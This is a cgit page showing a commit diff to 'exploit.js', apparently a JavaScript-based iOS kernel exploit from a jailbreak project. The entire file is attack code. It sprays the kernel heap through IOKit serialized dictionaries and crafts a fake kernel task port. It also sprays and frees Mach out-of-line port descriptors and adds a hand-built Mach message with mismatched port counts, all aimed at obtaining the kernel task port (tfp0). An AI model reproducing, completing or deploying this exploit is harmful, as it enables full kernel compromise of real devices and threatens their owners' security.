summaryrefslogtreecommitdiff
path: root/src/js/kexp/exploit.js
diff options
context:
space:
mode:
Diffstat (limited to 'src/js/kexp/exploit.js')
-rwxr-xr-xsrc/js/kexp/exploit.js126
1 files changed, 83 insertions, 43 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index c667dd2..715535d 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -61,11 +61,11 @@ var MIG_MAX = 0x1000;
var NDR_record = 0x36ebf00c;
function spray_data(mem, size, num, portptr) {
- var err = malloc(4);
+ var err = shit_heap(4);
var ret = 0;
- var master = malloc(4);
+ var master = shit_heap(4);
host_get_io_master(mach_host_self(), master);
- var dict = malloc(MIG_MAX);
+ var dict = shit_heap(MIG_MAX);
var __cnt = 0;
write_u32(dict + (__cnt << 2), kOSSerializeMagic); __cnt++;
write_u32(dict + (__cnt << 2), kOSSerializeEndCollection | kOSSerializeDictionary | 1); __cnt++;
@@ -95,16 +95,16 @@ function spray_data(mem, size, num, portptr) {
}
function copyinPort(kport, cnt) {
- var err = malloc(4);
+ var err = shit_heap(4);
var ret = 0;
var self = task_self;
var service = MACH_PORT_NULL;
- var client = malloc(4);
- var it = malloc(4);
+ var client = shit_heap(4);
+ var it = shit_heap(4);
var o = MACH_PORT_NULL;
- var data = malloc(4);
- var master = malloc(4);
- fakeportData = malloc(4);
+ var data = shit_heap(4);
+ var master = shit_heap(4);
+ fakeportData = shit_heap(4);
var host_self = mach_host_self();
host_get_io_master(mach_host_self(), master);
ret = spray_data(NULL, 0, 5, data);
@@ -123,7 +123,7 @@ function copyinPort(kport, cnt) {
write_buf(kpbuf + (i * kport_size), read_buf(kport + (i * kport_size), kport_size), kport_size);
}
- var err = malloc(4);
+ var err = shit_heap(4);
var xmls = "<plist><dict><key>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</key><integer size=\"512\">1768515945</integer></dict></plist>";
var xml = sptr(xmls);
ret = io_service_open_extended(service, self, 0, 0, 1, xml, xmls.length + 1, err, client);
@@ -138,8 +138,8 @@ function copyinPort(kport, cnt) {
var o = IOIteratorNext(read_u32(it));
while (o != MACH_PORT_NULL && !found) {
- var buf = malloc(16 * 4);
- var size = malloc(4);
+ var buf = shit_heap(16 * 4);
+ var size = shit_heap(4);
write_u32(size, 16 * 4);
ret = IORegistryEntryGetProperty(o, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", buf, size);
printf("%d %s\n", ret, mach_error_string(ret));
@@ -172,9 +172,9 @@ function prepare_ptr(dict, size, ptr, num) {
}
function spray(dict, size, port) {
- var err = malloc(4);
+ var err = shit_heap(4);
var ret = 0;
- var master = malloc(4);
+ var master = shit_heap(4);
host_get_io_master(mach_host_self(), master);
io_service_add_notification_ool(master, "IOServiceTerminate", dict, size, MACH_PORT_NULL, NULL, 0, err, port);
@@ -188,14 +188,17 @@ function spray(dict, size, port) {
var kp = 0;
function spray_ports(number_port_descs) {
- printf("spray_ports %d\n", number_port_descs);
if (kp == 0) {
- kp = malloc(4);
+ kp = shit_heap(4);
+ mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp);
+ mach_port_insert_right(task_self, read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND);
+ } else if (read_u32(kp) == 0) {
+ kp = shit_heap(4);
mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp);
mach_port_insert_right(task_self, read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND);
}
- var mp = malloc(4);
+ var mp = shit_heap(4);
mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp);
mach_port_insert_right(task_self, read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND);
@@ -205,7 +208,7 @@ function spray_ports(number_port_descs) {
// printf("%d (%s)\n", ret_, mach_error_string(ret_));
var ret = read_u32(mp);
- free(mp);
+ shit_heap_free(mp);
return ret;
}
@@ -231,19 +234,21 @@ function fast_array_mul(arr, n) {
}
function send_ports(target, payload, num, number_port_descs) {
- var init_port_set = malloc(num * 4);
+ var init_port_set = shit_heap(num * 4);
for (var i = 0; i < num; i++) {
write_u32(init_port_set + (i << 2), payload);
}
- // var buf = malloc(0x1c + (number_port_descs * 0xc * 8));
+ // var buf = shit_heap(0x1c + (number_port_descs * 0xc * 8));
// write_u32(buf + req_msgh_body_msgh_descriptor_count, number_port_descs);
-// var buf = new Uint32Array((0x1c + (3 * number_port_descs)) / 4);
+// var buf = new Uint32Array((0x1c + (3 * number_port_descs);
- large_buf[req_msgh_body_msgh_descriptor_count / 4] = number_port_descs;
+// write_u32(number_port_descs);
+
+ large_buf[req_msgh_body_msgh_descriptor_count >> 2] = number_port_descs;
var tmp = ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24));
@@ -267,36 +272,57 @@ function send_ports(target, payload, num, number_port_descs) {
}
function release_port_ptrs(port) {
- var req = malloc(0x1c + (5 * 0xc) + 0x8);
- for (var i = 0; i < (0x1c + (5 * 0xc) + 0x8); i += 4) {
- write_u32(req + i, 0x0);
- }
- printf("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0"));
+ var req = shit_heap(0x1c + (5 * 0xc) + 0x8);
+// printf("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0"));
var ret = mach_msg(req, MACH_RCV_MSG, 0, (0x1c + (5 * 0xc) + 0x8), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
- if (ret != KERN_SUCCESS) {
+ if (ret != KERN_SUCCESS) {
printf("mach_recv %d %s\n", ret, mach_error_string(ret));
}
- free(req);
+ shit_heap_free(req);
+}
+
+function r3gister(task, init_port_set, real_count, fake_count) {
+ var mess = shit_heap(0x1000);
+ var InP = mess;
+ var OutP = mess;
+
+ write_u32(InP + 0x18, 1);
+ write_u32(InP + 0x1c, init_port_set);
+ write_u32(InP + 0x20, real_count);
+ write_u32(InP + 0x24, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)));
+ write_u32(InP + 0x28, read_u32(NDR_record + get_dyld_shc_slide() + 0x0));
+ write_u32(InP + 0x2c, read_u32(NDR_record + get_dyld_shc_slide() + 0x4));
+ write_u32(InP + 0x30, fake_count);
+ write_u32(InP + 0x0, 0x80001513);
+ write_u32(InP + 0x8, task);
+ write_u32(InP + 0xc, mig_get_reply_port());
+ write_u32(InP + 0x14, 3403);
+
+ var ret = mach_msg(InP, 0x3, 0x34, 0x2c, read_u32(InP + 0xc), MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
+ if (ret == KERN_SUCCESS) {
+ ret = read_u32(OutP + 0x24);
+ }
+ return ret;
}
function get_kernel_task() {
var ret = 0;
var tfp0 = 0;
- sanity_port = malloc(4);
+ sanity_port = shit_heap(4);
task_self = mach_task_self();
mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, sanity_port);
mach_port_insert_right(task_self, read_u32(sanity_port), read_u32(sanity_port), MACH_MSG_TYPE_MAKE_SEND);
- limits = malloc(4);
+ limits = shit_heap(4);
write_u32(limits, 1000);
mach_port_set_attributes(task_self, read_u32(sanity_port), MACH_PORT_LIMITS_INFO, limits, MACH_PORT_LIMITS_INFO_COUNT);
printf("starting exploit\n");
- var data = malloc(16);
- var kport = malloc(kport_size * 2);
+ var data = shit_heap(16);
+ var kport = shit_heap(kport_size * 2);
var ptr = kport + kport_size; // maybe + 1? iirc adding 1 to a pointer adds sizeof(type) unless it's void or something
write_u32(kport + kport_ip_bits4, 0x80000002); // IO_BITS_ACTIVE | IOT_PORT | IKOT_TASK
write_u32(kport + kport_ip_references4, 100);
@@ -305,14 +331,14 @@ function get_kernel_task() {
write_u32(kport + kport_ip_receiver4, 0x12345678); // dummy
write_u32(kport + kport_ip_srights4, 99);
- var big_buf = malloc(MIG_MAX);
- var small_buf = malloc(MIG_MAX);
+ var big_buf = shit_heap(MIG_MAX);
+ var small_buf = shit_heap(MIG_MAX);
- var big_size = malloc(4);
- var small_size = malloc(4);
+ var big_size = shit_heap(4);
+ var small_size = shit_heap(4);
- var fp = malloc(PORTS_NUM * 4);
- var postSpray = malloc(4);
+ var fp = shit_heap(PORTS_NUM * 4);
+ var postSpray = shit_heap(4);
usleep(10000);
sched_yield();
@@ -325,22 +351,36 @@ function get_kernel_task() {
prepare_ptr(big_buf, big_size, kptr, 256);
prepare_ptr(small_buf, small_size, kptr, 32);
- var dummy = malloc(4);
+ var dummy = shit_heap(4);
for (var i = 0; i < PORTS_NUM_PRESPRAY; i++) {
spray(big_buf, big_size, dummy);
}
- var dummy = malloc(4);
+ var dummy = shit_heap(4);
for (var i = 0; i < PORTS_NUM; i++) {
- write_u32(fp + (i << 2), spray_ports(i));
+// for (var i = 0; i < 8; i++) {
+ if (i % 4 == 0) {
+ printf("spray_ports %d\n", i);
+ }
+ write_u32(fp + (i << 2), spray_ports(1));
spray(small_buf, small_size, dummy);
}
for (var i = 0; i < PORTS_NUM; i++) {
+// for (var i = 0; i < 8; i++) {
release_port_ptrs(read_u32(fp + (i << 2)));
}
+ var arrmpt = shit_heap(8);
+ write_u32(arrmpt, 0);
+ write_u32(arrmpt + 4, 0);
+ var ret__ = r3gister(mach_task_self(), arrmpt, 2, 3);
+ printf("%d %s", ret__, mach_error_string(ret__));
+ printf("r3gister done\n");
+
+
+
printf("get lucky\n");
return tfp0;
-} \ No newline at end of file
+}
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 20:48:13 +0000